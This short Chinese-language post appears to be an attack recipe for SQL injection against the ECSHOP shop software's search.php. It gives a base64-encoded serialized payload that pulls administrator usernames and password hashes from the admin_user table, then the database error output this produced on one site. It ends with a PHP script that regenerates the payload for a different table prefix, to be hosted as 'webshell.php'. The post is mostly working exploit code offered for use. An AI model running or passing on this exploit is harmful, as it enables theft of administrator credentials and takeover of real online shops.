ECSHOP 利用网上的EXP:

search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

 

 

返回：
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT goods_id, COUNT(*) AS num FROM `ccwww`.`ccc_goods_attr` WHERE 0 OR (1 AND attr_id = '1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'"\') union select 1#"'),1 from ecs_admin_user#' AND attr_value LIKE '%1%' ) GROUP BY goods_id HAVING num = '1' ) [2] => Array ( [error] => Table 'ccwww.ecs_admin_user' doesn't exist ) [3] => Array ( [errno] => 1146 ) )
原因是数据库前缀修改的问题。

解决办法：重新生成EXP变种文件。

用下面的代码生成一个code：

 

<?php
$p="ecs_";
$p=isset($_REQUEST['pre'])?$_REQUEST['pre']:$p;
$arr=array("1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'\"\\') union select 1#\"'),1 from ".$p."admin_user#"=>"1");
$exp = array("attr"=>$arr);
$exp = base64_encode(serialize($exp));
//echo $exp;
?>
<textarea name="textarea" id="textarea" cols="100" rows="5"><?=$exp?></textarea>

 

 

 

以上代码保存为webshell.php,

修改红色的ecs_前缀表改为以本文章为例的蓝色的ccc_前缀表

通过https://www.webshell.cc/webshell.php访问，生成新的BASE64加密文件。